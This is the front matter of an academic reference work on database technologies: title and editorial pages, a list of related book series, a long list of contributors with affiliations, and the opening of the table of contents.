Database Technologies: Concepts, Methodologies, Tools, and Applications
John Erickson
University of Nebraska–Omaha, USA
Volume I
INFORMATION SCIENCE REFERENCE Hershey • New York
Director of Editorial Content: Kristin Klinger
Senior Managing Editor: Jamie Snavely
Managing Editor: Jeff Ash
Assistant Managing Editor: Carole Coulson
Typesetters: Jeff Ash, Michael Brehm, Carole Coulson, Elizabeth Duke, Jennifer Henderson, Christopher Hrobak, Jamie Snavely, Sean Woznicki
Cover Design: Lisa Tosheff
Printed at: Yurchak Printing Inc.
British Cataloguing in Publication Data
A Cataloguing in Publication record for this book is available from the British Library.
All work contributed to this book is new, previously-unpublished material. The views expressed in this book are those of the authors, but not necessarily of the publisher.
If a library purchased a print copy of this publication, please go to http://www.igi-global.com/agreement for information on activating the library's complimentary electronic access to this publication.
Editor-in-Chief
Mehdi Khosrow-Pour, DBA
Editor-in-Chief, Contemporary Research in Information Science and Technology, Book Series
Associate Editors
Steve Clarke, University of Hull, UK
Murray E. Jennex, San Diego State University, USA
Annie Becker, Florida Institute of Technology, USA
Ari-Veikko Anttiroiko, University of Tampere, Finland
Editorial Advisory Board
Sherif Kamel, American University in Cairo, Egypt
In Lee, Western Illinois University, USA
Jerzy Kisielnicki, Warsaw University, Poland
Keng Siau, University of Nebraska-Lincoln, USA
Amar Gupta, Arizona University, USA
Craig van Slyke, University of Central Florida, USA
John Wang, Montclair State University, USA
Vishanth Weerakkody, Brunel University, UK
Additional Research Collections found in the “Contemporary Research in Information Science and Technology” Book Series
Data Mining and Warehousing: Concepts, Methodologies, Tools, and Applications
John Wang, Montclair State University, USA • 6-volume set • ISBN 978-1-60566-056-1
Electronic Business: Concepts, Methodologies, Tools, and Applications
In Lee, Western Illinois University • 4-volume set • ISBN 978-1-59904-943-4
Electronic Commerce: Concepts, Methodologies, Tools, and Applications
S. Ann Becker, Florida Institute of Technology, USA • 4-volume set • ISBN 978-1-59904-943-4
Electronic Government: Concepts, Methodologies, Tools, and Applications
Ari-Veikko Anttiroiko, University of Tampere, Finland • 6-volume set • ISBN 978-1-59904-947-2
Knowledge Management: Concepts, Methodologies, Tools, and Applications
Murray E. Jennex, San Diego State University, USA • 6-volume set • ISBN 978-1-59904-933-5
Information Communication Technologies: Concepts, Methodologies, Tools, and Applications
Craig Van Slyke, University of Central Florida, USA • 6-volume set • ISBN 978-1-59904-949-6
Intelligent Information Technologies: Concepts, Methodologies, Tools, and Applications
Vijayan Sugumaran, Oakland University, USA • 4-volume set • ISBN 978-1-59904-941-0
Information Security and Ethics: Concepts, Methodologies, Tools, and Applications
Hamid Nemati, The University of North Carolina at Greensboro, USA • 6-volume set • ISBN 978-1-59904-937-3
Medical Informatics: Concepts, Methodologies, Tools, and Applications
Joseph Tan, Wayne State University, USA • 4-volume set • ISBN 978-1-60566-050-9
Mobile Computing: Concepts, Methodologies, Tools, and Applications
David Taniar, Monash University, Australia • 6-volume set • ISBN 978-1-60566-054-7
Multimedia Technologies: Concepts, Methodologies, Tools, and Applications
Syed Mahbubur Rahman, Minnesota State University, Mankato, USA • 3-volume set • ISBN 978-1-60566-054-7
Virtual Technologies: Concepts, Methodologies, Tools, and Applications
Jerzy Kisielnicki, Warsaw University, Poland • 3-volume set • ISBN 978-1-59904-955-7
Free institution-wide online access with the purchase of a print collection!
Order online at www.igi-global.com or call 717-533-8845 ext. 100, Mon–Fri 8:30 am–5:00 pm (EST), or fax 24 hours a day to 717-533-7115
List of Contributors
Abdul-Mehdi, Ziyad Tariq \ Multimedia University, Malaysia ..................................................... 1257 Adogbeji, Oghenevwogaga Benson \ Delta State University, Abraka, Nigeria ............................. 1454 Adomi, Esharenana E. \ Delta State University, Abraka, Nigeria.................................................. 1454 Adzic, Jovanka \ Telecom Italia, Italy ............................................................................................... 847 Afsarmanesh, Hamideh \ University of Amsterdam, The Netherlands........................................... 1446 Al-Ahmadi, Mohammad Saad \ Oklahoma State University, USA.................................................. 186 Al-Ali, Abdul-Rahman \ American University of Sharjah, UAE.................................................... 1357 Al-Ameed, Hayder \ United Arab Emirates University, United Arab Emirates ............................. 1899 Alavares, Luis Otavio \ Universidade Federal do Rio Grande do Sul (UFRGS), Brazil ............... 2405 Al-Hanbali, Nedal \ Al-Balqa’ Applied University, Jordan ............................................................. 1741 Amparo Vila, M. \ University of Granada, Spain ........................................................................... 2448 Anbumani, K. \ Karunya Institute of Technology and Sciences (Deemed University), India......... 1050 Artz, John M. \ The George Washington University, USA .................................................................... 1 Ashktorab, Hassan \ Howard University Hospital, USA ................................................................ 1393 Au, Wai-Ho \ Microsoft Corporation, USA, ................................................................................... 2427 Aufaure, Marie-Aude \ Supélec—INRIA, France............................................................................... 60 Azevedo, Paulo Jorge \ Universidade do Minho, Portugal ............................................................ 2632 Azzag, H. \ Université François-Rabelais de Tours, France and Laboratoire d‘Informatique (EA 2101), France............................................................................................................................. 1151 Bagchi, Aditya \ Indian Statistical Institute, India ............................................................................ 414 Bajaj, Akhilesh \ The University of Tulsa, USA .............................................................................. 1723 Baker, Jason D. \ Regent University, USA....................................................................................... 1285 Bandyopadhyay, A.K. \ Jadavpur University, India ......................................................................... 414 Bang, Jounghae \ Kookmin University, Korea ................................................................................ 1778 Barbosa Perkusich, Maria Lígia \ Universidade Católica de Pernambuco, Brazil ...................... 1020 Bartsch, Robert A. \ University of Houston–Clear Lake, USA....................................................... 1867 Barzdins, Guntis \ University of Latvia, Latvia .............................................................................. 2360 Barzdins, Janis \ University of Latvia, Latvia ................................................................................. 2360 Bass, Kristin M. \ University of California, Berkeley, USA ............................................................ 
1291 Beaubouef, Theresa \ Southeastern Louisiana University, USA..................................................... 1127 Beckerman, Barbara G. \ Oak Ridge National Laboratory, USA .................................................... 484 Bellatreche, Ladjel \ Poitiers University, France ........................................................................... 2292 Berberidis, Christos \ Aristotle University of Thessaloniki, Greece............................................... 2192 Berčič, Boštjan \ Institute for Economics, Law and Informatics, Slovenia ..................................... 2085 Berjón Gallinas, Roberto \ Pontifical University of Salamanca, Spain ......................................... 1959
Blanco, Ignacio José \ University of Granada, Spain ..................................................................... 2448 Blind, Knut \ Fraunhofer Institute for Systems and Innovation Research, Germany and Berlin University of Technology, Germany................................................................................ 1529 Bogorny, Vania \ Universidade Federal do Rio Grande do Sul (UFRGS), Brazil and Transnational University of Limburg, Belgium ......................................................................... 2405 Boston, George \ Western Michigan University, USA ..................................................................... 1405 Botsis, Taxiarchis \ Athens Medical School, Greece ....................................................................... 1385 Bouet, Marinette \ LIMOS, Blaise Pascal University-Clermont-Ferrand, France ............................ 60 Bouguettaya, Athman \ Virginia Tech, USA ..................................................................................... 903 Boussaïd, Omar \ University LUMIERE Lyon, France....................................................................... 60 Brayner, Angelo \ University of Fortaleza, Brazil........................................................................... 2472 Bruckner, Robert M. \ Microsoft, USA............................................................................................. 505 Brydon, Michael \ Simon Fraser University, Canada..................................................................... 2572 Buccafurri, Francesco \ University “Mediterranea” of Reggio Calabria, Italy ............................ 2037 Caminiti, Gianluca \ University “Mediterranea” of Reggio Calabria, Italy ................................. 2037 Candan, K. Selçuk \ Arizona State University, USA ....................................................................... 1276 Cannataro, Mario \ Università “Magna Græcia” di Catanzaro, Italy........................................... 1267 Cao, Tru H. \ Ho Chi Minh City University of Technology, Vietnam ................................................ 126 Caroprese, Luciano \ DEIS Universitá della Calabria, Italy ......................................................... 2051 Caschera, Maria Chiara \ IRPPS-CNR, Italy................................................................................. 1003 Cavalcanti, Valéria M. B. \ Federal University of Campina Grande, Brazil ................................... 987 Cerans, Karlis \ University of Latvia, Latvia .................................................................................. 2360 Chan, Hock Chuan \ National University of Singapore, Singapore ............................................... 1604 Che, Dunren \ Illinois University at Carbondale, USA ................................................................... 2059 Chen, Jianhua \ Louisiana State University, USA........................................................................... 2166 Chen, Min \ Florida International University, USA ........................................................................ 1189 Chen, Peter P. \ Louisiana State University, USA ............................................................................. 702 Chen, Shu-Ching \ Florida International University, USA............................................................. 1189 Chen, Yan \ Louisiana State University Agricultural Center, USA.................................................. 
2166 Cheung, Pak-Keung \ University of Hong Kong, Pokfulam, Hong Kong....................................... 1622 Christophides, V. \ Institute of Computer Science & University of Crete, Greece............................ 596 Coenen, Frans \ University of Liverpool, UK.................................................................................. 2657 Cress, Ulrike \ Knowledge Media Research Center, Germany........................................................ 1670 Crowston, Kevin \ Syracuse University, USA ................................................................................... 797 Cuadrado, J. J. \ University of Alcalá de Henares, Spain............................................................... 2000 Cuapa Canto, Rosalba \ Benemérita Universidad Autónoma de Puebla, Mexico ......................... 2261 Cunningham, Colleen \ Drexel University, USA............................................................................... 702 Cuzzocrea, Alfredo \ University of Calabria, Italy ........................................................................... 165 D’Ulizia, Arianna \ IRPPS-CNR, Italy ............................................................................................ 1003 Dalkilic, Mehmet \ Indiana University, USA................................................................................... 2384 Dallwitz, John \ Ara Irititja, Pitjantjatjara Council Inc., Australia................................................ 1462 Dang, Tran Khanh \ National University of Ho Chi Minh City, Vietnam....................................... 2204 Danielson, Peter \ University of British Columbia, Canada ........................................................... 1808 Darmont, Jérôme \ ERIC, University of Lyon 2, France ................................................................ 1226 David, Stefano \ Polytechnic University of Marche, Italy ................................................................. 257 de Aguiar Moraes Filho, José \ University of Fortaleza, Brazil..................................................... 2472
de Almeida, Hyggo Oliveira \ Federal University of Campina Grande, Brazil ............................. 1020 de Amo, Sandra \ Universidade Federal de Uberlândia, Brazil..................................................... 1205 de Caluwe, Rita \ Ghent University, Belgium.................................................................................... 135 de la Torre Díez, Isabel \ University of Valladolid, Spain............................................................... 1372 de Souza Baptista, Claudio \ Federal University of Campina Grande, Brazil ................................ 987 de Tré, Guy \ Ghent University, Belgium........................................................................................... 135 Deb, Sagarmay \ Southern Cross University, Australia .................................................................... 179 Decker, Hendrik \ Universidad Politécnica de Valencia, Spain ....................................................... 212 Dholakia, Nikhilesh \ University of Rhode Island, USA ................................................................. 1778 Dillon, Tharam S. \ University of Technology, Sydney, Australia ..................................................... 570 Ding, Gang \ Olympus Communication Technology of America, Inc., USA.................................... 2564 Dirs, Mustafa M. \ College University Technology Tun Hussein Onn, Malaysia ........................... 1257 Dolado, J. J. \ University of the Basque Country, Spain.................................................................. 2000 Duncan, George T. \ Carnegie Mellon University, USA ................................................................. 1823 Elovici, Yuval \ Ben-Gurion University of the Negev, Israel ............................................................. 384 Engel, Paulo Martins \ Universidade Federal do Rio Grande do Sul (UFRGS), Brazil................ 2405 Eschenbrenner, Brenda \ University of Nebraska-Lincoln, USA ................................................... 2595 Etzkorn, Letha H. \ University of Alabama, USA........................................................................... 1984 Evermann, Joerg \ Memorial University of Newfoundland–St. John’s, Canada .............................. 282 Evdoridis, Theodoros \ University of the Aegean, Greece.............................................. 13, 2079, 2109 Faloutsos, Christos \ Carnegie Mellon University, USA................................................................. 2011 Fan, Fengxian \ Kunming University, China ................................................................................... 1568 Fermoso Garcia, Ana María \ Pontifical University of Salamanca, Spain .................................... 1959 Fernández-Medina, Eduardo \ Universidad de Castilla-La Mancha, Spain................................... 637 Ferreira, Pedro Gabriel \ Universidade do Minho, Portugal......................................................... 2632 Ferrer-Troyano, F. \ University of Seville, Spain ............................................................................ 2000 Fiore, Valter \ Telecom Italia, Italy.................................................................................................... 847 Flores, Dionicio Zacarías \ Benemérita Universidad Autónoma de Puebla, Mexico ..................... 2261 Flores, Fernando Zacarías \ Benemérita Universidad Autónoma de Puebla, Mexico................... 
2261 Folinas, Nikolaos \ University of Ioannina, Greece ........................................................................ 1844 Fong, Joseph \ City University of Hong Kong, Hong Kong ............................................................ 2489 Fox, Mark S. \ University of Toronto, Canada ................................................................................ 2384 Fugazza, Cristiano \ University of Milan, Italy................................................................................. 257 Furtado, Pedro \ Universidade de Coimbra, Portugal...................................................................... 658 Gadish, David A. \ California State University Los Angeles, USA ................................................. 2685 Gançarski, Pierre \ LSIIT-AFD-Louis Pasteur University, France .................................................... 60 Gaynor, Mark \ Boston University School of Management, USA................................................... 1344 Gedeon, Randle J. \ Western Michigan University, USA ................................................................ 1405 Gelbard, Roy \ Bar-Ilan University, Israel...................................................................................... 2157 George, Carlisle \ Middlesex University, UK .................................................................................. 2085 Giacometti, Arnaud \ Université François Rabelais de Tours, France .......................................... 1205 Golfarelli, Matteo \ DEIS–University of Bologna, Italy.................................................................... 221 González Císaro, Sandra Elizabeth \ Universidad Nacional del Centro de la Provincia de Buenos Aires, Argentina ............................................................................................ 648 Gorla, Narasimhaiah \ American University of Sharjah, UAE ...................................................... 2543
Guinot, C. \ CE.R.I.E.S., Unité Biométrie et Epidémiologie, and Université François-Rabelais de Tours, Laboratoire d‘Informatique (EA 2101), France........ 1151 Guo, Huiping \ California State University at Los Angeles, USA................................................... 2223 Guzmán Muñoz, Luis Miguel \ Benemérita Universidad Autónoma de Puebla, Mexico.............. 2261 Hakkani-Tür, Dilek \ AT&T Labs—Research, USA........................................................................ 2129 Halaoui, Hatem F. \ Haigazian University, Lebanon ........................................................................ 395 Hamel, Lutz \ University of Rhode Island, USA.............................................................................. 1778 Hashmi, Nada \ 10Blade, Inc., USA ................................................................................................ 1344 Hertzberger, Louis O. \ University of Amsterdam, The Netherlands.............................................. 1446 Hornero Sánchez, Roberto \ University of Valladolid, Spain......................................................... 1372 Hosseinkhah, Fatemeh \ Howard University Hospital, USA.......................................................... 1393 Hosszú, Gábor \ Budapest University of Technology and Economics, Hungary ............................ 1663 Houliston, Bryan \ Auckland University of Technology, New Zealand........................................... 2324 Hughes, Martin \ Smart Works, Australia ....................................................................................... 1462 Huh, Soon-Young \ KAIST Business School, South Korea................................................................ 755 Hults, Patricia \ Rensselaer Polytechnic Institute, USA.................................................................... 320 Hurson, Ali R. \ Pennsylvania State University, USA ....................................................................... 484 Ibrahim, Hamidah \ Universiti Putra Malaysia, Malaysia ............................................................ 1257 Ieronutti, Lucio \ University of Udine, Italy...................................................................................... 615 Indraratne, Harith \ Budapest University of Technology and Economics, Hungary ..................... 1663 Islam, Zahidul \ Independent University, Bangladesh .................................................................... 1936 Jiao, Yu \ Oak Ridge National Laboratory, USA ............................................................................... 484 Junior, Waldecir P. \ Universidade Federal de Uberlândia, Brazil................................................ 1205 Kacprzyk, Janusz \ Polish Academy of Sciences, Poland....................................................... 135, 1038 Kaletas, Ersin C. \ University of Amsterdam, The Netherlands ...................................................... 1446 Kang, David \ Chapman University, USA........................................................................................ 1756 Karamalis, Athanasios \ Computer Scientist and Researcher, Germany........................................ 1420 Karydis, Ioannis \ Aristotle University of Thessaloniki, Greece......................................................... 35 Katakis, Ioannis \ Aristotle University of Thessaloniki, Greece ....................................................... 
309 Kim, Hee-Woong \ National University of Singapore, Singapore................................................... 1604 Kim, Henry M. \ York University, Canada...................................................................................... 2384 Kimmerle, Joachim \ University of Tuebingen, Germany .............................................................. 1670 King, William R. \ University of Pittsburgh, USA........................................................................... 1638 Klemen, Markus D. \ Vienna University of Technology, Austria .................................................... 2348 Koffina, I. \ Institute of Computer Science & University of Crete, Greece........................................ 596 Korff, Lori \ Virginia Tech, USA........................................................................................................ 903 Kouris, Ioannis N. \ University of Patras, Greece ............................................................................ 196 Kovács, László \ University of Miskolc, Hungary ............................................................................. 931 Krejza, Andrea \ Credit Suisse, Switzerland ................................................................................... 1787 Kubota, Sachiko \ Hiroshima University, Japan............................................................................... 956 Kwahk, Kee-Young \ Kookmin University, Korea .......................................................................... 1604 Kwan, M. Millie \ University of Hong Kong, Pokfulam, Hong Kong ............................................. 1622 Laleau, Régine \ University of Paris 12, France............................................................................. 1168 Landolsi, Taha \ American University of Sharjah, UAE ................................................................. 1357 Langton, Marcia \ The University of Melbourne, Australia ........................................................... 1472 Lax, Gianluca \ University “Mediterranea” of Reggio Calabria, Italy.......................................... 2037
Le, D. Xuan \ La Trobe University, Australia .................................................................................... 678 Li, Chang-Tsun \ University of Warwick, UK ................................................................................. 1062 Li, Xining \ University of Guelph, Guelph, Canada .......................................................................... 457 Li, Yingjiu \ Singapore Management University, Singapore ........................................................... 2223 Lim, Say Ying \ Monash University, Australia ...................................................................... 1108, 1235 Ling, Tok Wang \ National University of Singapore, Singapore....................................................... 505 Liu, Han \ Carnegie Mellon University, USA .................................................................................... 505 Lobina, Mirko Luca \ University of Cagliari, Italy ........................................................................ 2616 Locuratolo, Elvira \ ISTI, Consiglio Nazionale delle Ricerche, Italy ............................................... 440 Loendorf, Todd \ North Carolina State University, USA ................................................................ 1511 López Coronado, Miguel \ University of Valladolid, Spain............................................................ 1372 López Gálvez, María Isabel \ University of Valladolid, Spain ....................................................... 1372 Ma, Z. M. \ Northeastern University, China.............................................................................. 105, 338 Madiraju, Praveen \ Marquette University, USA.............................................................................. 550 Maier, Daniel \ Credit Suisse, Switzerland ...................................................................................... 1787 Makris, Christos \ University of Patras, Greece............................................................................... 196 Malik, Zaki \ Virginia Tech, USA....................................................................................................... 903 Mallach, Efrem \ University of Massachusetts, Dartmouth, USA..................................................... 468 Mamat, Ali Bin \ Universiti Putra Malaysia, Malaysia .................................................................. 1257 Mammar, Amel \ University of Luxembourg, Luxembourg............................................................. 1168 Mann, Bruce L. \ Memorial University, Canada .............................................................................. 894 Manolopoulos, Yannis \ Aristotle University of Thessaloniki, Greece................................................ 35 Manouselis, Nikos \ Agricultural University of Athens, Greece........................................................ 362 Margaritis, Dimitris \ Iowa State University, USA ......................................................................... 2011 Margerum-Leys, Jon \ Eastern Michigan University, USA............................................................ 1291 Martinenghi, Davide \ Free University of Bozen/Bolzano, Italy ...................................................... 212 Martínez-Cruz, Carmen \ University of Jaén, Spain ..................................................................... 2448 Mayer, Christopher B. \ Air Force Institute of Technology, USA................................................... 
1276 Mazel, Odette \ The University of Melbourne, Australia ................................................................ 1472 McDonald, J. Scott \ University of Texas El Paso, USA ................................................................. 1682 McKenzie, W. Brett \ Roger Williams University, USA .................................................................... 205 Meged, Avichai \ Bar-Ilan University, Israel................................................................................... 2157 Meirelles, Marcelo \ University of Fortaleza, Brazil ...................................................................... 2472 Meo, Rosa \ Università di Torino, Italy............................................................................................ 1320 Merwin, Gerald A. Jr. \ Valdosta State University, USA ................................................................ 1682 Mitra, Susanta \ International Institute of Information Technology, India....................................... 414 Mohan, Sriram \ Indiana University, USA........................................................................................ 527 Molinaro, Cristian \ DEIS Universitá della Calabria, Italy ........................................................... 2051 Montesanto, Anna \ Polytechnic University of Marche, Italy........................................................... 257 Moulton, Steven \ Boston University School of Medicine, USA ..................................................... 1344 Muegeli, Thomas \ Credit Suisse, Switzerland ................................................................................ 1787 Mula, Davide \ LUISS Guido Carli, Italy ........................................................................................ 2616 Myung, Dan \ 10Blade, Inc., USA ................................................................................................... 1344 Nah, Fiona Fui-Hoon \ University of Nebraska-Lincoln, USA ............................................. 1936, 2595 Nanopoulos, Alexandros \ Aristotle University of Thessaloniki, Greece............................................ 35 Nassis, Vicky \ La Trobe University, Australia .................................................................................. 570
Natarajan, Rajesh \ Indian Institute of Management Lucknow (IIML), India................................ 1652 Naumann, Felix \ Humboldt-Universität zu Berlin, Germany ........................................................ 2140 Navathe, Shamkant B. \ Georgia Institute of Technology, USA ....................................................... 550 Nedunchezhian, R. \ Sri Ramakrishna Engineering College, India ............................................... 1050 Newhouse, C. Paul \ Edith Cowan University, Australia ................................................................ 1309 Ni, Jingbo \ University of Guelph, Guelph, Canada.......................................................................... 457 Nigro, Héctor Oscar \ Universidad Nacional del Centro de la Provincia de Buenos Aires, Argentina ............................................................................................ 648 Nlenanya, Inya \ Iowa State University, USA.................................................................................... 778 Odera, Levy C. \ University of Florida, USA.................................................................................. 1682 Oke, S. A. \ University of Lagos, Nigeria........................................................................................... 940 Orme, Anthony Mark \ Athens State University, USA ................................................................... 1984 Owrang O., M. Mehdi \ American University, USA ............................................................... 238, 1393 Ozkul, Tarik \ American University of Sharjah, UAE..................................................................... 1357 Palmer, Lisa \ The University of Melbourne, Australia................................................................... 1472 Papapetrou, Evangelos \ University of Ioannina, Greece............................................................... 1844 Patki, A. B. \ Department of Information Technology, India ........................................................... 1490 Patki, Tapasya \ GGSIP University, India ....................................................................................... 1490 Pears, Russel \ Auckland University of Technology, New Zealand.................................................. 2324 Pedersen, Torben Bach \ Aalborg University, Denmark................................................................. 2510 Pepe, Marissa \ Boston University School of Management, USA ................................................... 1344 Perkusich, Angelo \ Federal University of Campina Grande, Brazil ............................................. 1020 Petry, Frederick E. \ Naval Research Laboratory, USA ................................................................. 1127 Piattini, Mario \ Universidad de Castilla-La Mancha, Spain ........................................................... 637 Picariello, Antonio \ University of Napoli, Italy.............................................................................. 2275 Picarougne, F. \ Université François-Rabelais de Tours, Laboratoire d‘Informatique (EA 2101), France ............................................................................... 1151 Pighin, Maurizio \ University of Udine, Italy.................................................................................... 615 Pitoura, Evaggelia \ University of Ioannina, Greece ...................................................................... 1844 Potok, Thomas E. 
\ Oak Ridge National Laboratory, USA............................................................... 484 Poza Crespo, Jesús \ University of Valladolid, Spain...................................................................... 1372 Psaila, Giuseppe \ Università di Bergamo, Italy ............................................................................. 1320 Radaideh, Moh’d A. \ Abu Dhabi Police – Ministry of Interior, United Arab Emirates ................ 1899 Raffeiner, Stefan \ Vienna University of Technology, Austria ......................................................... 2348 Rahayu, J. Wenny \ La Trobe University, Melbourne, Australia.............................................. 570, 678 Rajugan, R. \ University of Technology, Sydney, Australia ............................................................... 570 Ram, Sudha \ The University of Arizona, USA................................................................................ 1723 Ras, Zbigniew W. \ University of North Carolina at Charlotte, USA ............................................. 2313 Ravat, Franck \ Université Toulouse I, France................................................................................. 961 Reinhartz-Berger, Iris \ University of Haifa, Israel ....................................................................... 1581 Rezgui, Abdelmounaam \ Virginia Tech, USA.................................................................................. 903 Ribeiro Neto, Pedro Fernandes \ Universidade do Estado do Rio Grande do Norte, Brazil ........ 1020 Riquelme, J. \ University of Seville, Spain ...................................................................................... 2000 Rizzi, Stefano \ DEIS–University of Bologna, Italy..................................................................... 86, 221 Rocchi, Cesare \ Polytechnic University of Marche, Italy................................................................. 257 Rodríguez, D. \ University of Reading, UK ..................................................................................... 2000
Roehrig, Stephen F. \ Carnegie Mellon University, USA................................................................ 1823 Röhm, Uwe \ University of Sydney, Australia.................................................................................... 829 Rokach, Lior \ Ben-Gurion University of the Negev, Israel .............................................................. 384 Rong, Graham H. \ Massachusetts Institute of Technology, USA................................................... 2166 Rosen, Peter A. \ University of Evansville, USA................................................................................ 186 Rossi, Matti \ Helsinki School of Economics, Finland .................................................................... 1876 Roth, Mary \ IBM Silicon Valley Lab, USA..................................................................................... 2140 Sadoun, Balqies \ Al-Balqa’ Applied University, Jordan................................................................. 1741 Sapino, Maria Luisa \ University of Torino, Italy........................................................................... 2275 Saygin, Yücel \ Sabanci University, Turkey ..................................................................................... 2129 Schiel, Ulrich \ Federal University of Campina Grande, Brazil ....................................................... 987 Schlueter Langdon, Christoph \ University of Southern California, USA ...................................... 866 Scozzi, Barbara \ Politecnico di Bari, Italy....................................................................................... 797 Selviah, David R. \ University College London, UK ....................................................................... 1084 Sengupta, Arijit \ Wright State University, USA ..................................................................... 527, 2384 Serfiotis, G. \ Institute of Computer Science & University of Crete, Greece..................................... 596 Shahri, Hamid Haidarian \ University of Maryland, USA............................................................. 2245 Shekar, B. \ Indian Institute of Management Bangalore (IIMB), India ........................................... 1652 Shin, Seung-Kyoon \ University of Rhode Island, USA .................................................................. 1778 Shiu, Herbert \ City University of Hong Kong, Hong Kong ........................................................... 2489 Siau, Keng \ University of Nebraska-Lincoln, USA......................................................................... 2595 Sisto, Luisella \ Telecom Italia, Italy ................................................................................................. 847 Smolander, Kari \ Lappeenranta University of Technology, Finland ............................................. 1876 Song, Il-Yeol \ Drexel University, USA .............................................................................................. 702 Song, Lei \ University of Guelph, Guelph, Canada ........................................................................... 457 Squire, Megan \ Elon University, USA ............................................................................................ 2301 Srinivasan, Bala \ Monash University, Australia .................................................................. 1108, 1235 Stewart, Tracy R. \ Regent University, USA ................................................................................... 
1285 Sturm, Arnon \ Ben-Gurion University of the Negev, Israel........................................................... 1581 Sugito, Shigenobu \ Sugiyama University, Japan.............................................................................. 956 Sun, Wei \ Monash University, Australia ......................................................................................... 1552 Sunderraman, Rajshekhar \ Georgia State University, USA........................................................... 550 Suni, Ravio \ University of Tartu, Estonia ....................................................................................... 1477 Syrigos, Konstantinos \ Athens Medical School, Greece................................................................ 1385 Tan, Mathew \ Agilent Technologies, Malaysia............................................................................... 1936 Taniar, David \ Monash University, Australia ...................................................... 678, 1108, 1235,1552 Tannen, V. \ University of Pennsylvania, USA................................................................................... 596 Teste, Olivier \ Université Toulouse III, France ................................................................................ 961 Theodoridis, Evangelos \ University of Patras, Greece.................................................................... 196 Thrun, Sebastian \ Stanford University, USA ................................................................................. 2011 Tikk, Domonkos \ Budapest University of Technology and Economics, Hungary ........................... 931 Tininini, Leonardo \ IASI-CNR, Italy ............................................................................................. 1003 Tjoa, A. Min \ Vienna University of Technology, Austria .................................................................. 505 Tollefsen, William W. \ Boston University School of Medicine, USA ............................................. 1344 Torabi, Torab \ La Trobe University, Australia ............................................................................... 1552 Trubitsyna, Irina \ DEIS Universitá della Calabria, Italy.............................................................. 2051
Trujillo, Juan \ Universidad de Alicante, Spain ................................................................................ 637 Tsakalidis, Athanasios \ University of Patras, Greece...................................................................... 196 Tsoumakas, Grigorios \ Aristotle University of Thessaloniki, Greece...................................... 157, 309 Tu, Yi-Cheng \ University of South Florida, USA ........................................................................... 2564 Tür, Gökhan \ AT&T Labs–Research, USA..................................................................................... 2129 Tzanis, George \ Aristotle University of Thessaloniki, Greece ....................................................... 2192 Tzikopoulos, Agiris \ Agricultural University of Athens, Greece...................................................... 362 Tzouramanis, Theodoros \ University of the Aegean, Greece.............................. 13, 2079, 2109, 2118 Udoh, Emmanuel \ Indiana University–Purdue University, USA........................................... 887, 1928 Unal, Ozgul \ University of Amsterdam, The Netherlands............................................................... 1446 Vassiliadis, Panos \ University of Ioannina, Greece........................................................................ 1844 Veen, Ranjit \ American University, USA........................................................................................ 1393 Veltri, Pierangelo \ Università “Magna Græcia” di Catanzaro, Italy............................................ 1267 Venturini, G. \ Université François-Rabelais de Tours, Laboratoire d‘Informatique (EA 2101), France............................................................................................................................. 1151 Verykios, Vassilios S. \ University of Thessaly, Greece................................................................... 2268 Villarroel, Rodolfo \ Universidad Católica del Maule, Chile ........................................................... 637 Vining, Aidan R. \ Simon Fraser University, Canada..................................................................... 2572 Vlahavas, Ioannis \ Aristotle University of Thessaloniki, Greece..................................................... 157 Vuorikari, Riina \ European Schoolnet, Belgium.............................................................................. 362 Wang, Haibin \ Emory University, USA ............................................................................................ 550 Wang, Shuhong \ University of Wollongong, Australia................................................................... 2223 Wang, Yanbo J. \ University of Liverpool, UK................................................................................ 2657 Wei, Chia-Hung \ University of Warwick, UK ................................................................................ 1062 Weippl, Edgar R. \ Secure Business Austria, Austria and Vienna University of Technology, Austria........................................................................ 2100, 2348 Welsh, Matt \ Harvard University, USA .......................................................................................... 1344 Wilson, Rick L. \ Oklahoma State University, USA .......................................................................... 186 Wilson, Roland \ University of Warwick, UK.................................................................................. 
1062 Wolff, J. Gerard \ CognitionResearch.org.uk, UK............................................................................ 725 Wyrzykowska, Elzbieta M. \ University of Information Technology and Management, Poland... 2313 Yakali, H. Hakan \ University of Amsterdam, The Netherlands...................................................... 1446 Yan Betty, Pang Wing \ Hong Kong Polytechnic University, Hong Kong...................................... 2543 Yang, Kun-Woo \ Keimyung University, South Korea ...................................................................... 755 Yin, Xuepeng \ Aalborg University, Denmark ................................................................................. 2510 Zadrożny, Slawomir \ Polish Academy of Sciences, Poland .................................................. 135, 1038 Zarras, Apostolos \ University of Ioannina, Greece........................................................................ 1844 Zhang, Ji \ University of Toronto, Canada ........................................................................................ 505 Zhao, Wenbing \ Cleveland State University, USA ............................................................................. 28 Zheng, Xinwei \ University of Durham, UK .................................................................................... 2657 Zumpano, Ester \ DEIS Universitá della Calabria, Italy ............................................................... 2051 Zurfluh, Gilles \ Université Toulouse I, France ................................................................................ 961
Contents
Volume I Section I. Fundamental Concepts and Theories This section serves as the foundation for this exhaustive reference tool by addressing crucial theories essential to the understanding of database technologies. Chapters found within these pages provide an excellent framework in which to position database technologies within the field of information science and technology. Individual contributions provide overviews of data warehousing and database management systems, while also exploring critical stumbling blocks of this field. Within this introductory section, the reader can learn and choose from a compendium of expert research on the elemental theories underscoring the research and application of database technologies. Chapter 1.1. Philosophical Foundations of Information Modeling ........................................................ 1 John M. Artz, The George Washington University, USA Chapter 1.2. A Generalized Comparison of Open Source and Commercial Database Management Systems ................................................................................................................................................. 13 Theodoros Evdoridis, University of the Aegean, Greece Theodoros Tzouramanis, University of the Aegean, Greece Chapter 1.3. Highly Available Database Management Systems........................................................... 28 Wenbing Zhao, Cleveland State University, USA Chapter 1.4. Mining in Music Databases.............................................................................................. 35 Ioannis Karydis, Aristotle University of Thessaloniki, Greece Alexandros Nanopoulos, Aristotle University of Thessaloniki, Greece Yannis Manolopoulos, Aristotle University of Thessaloniki, Greece
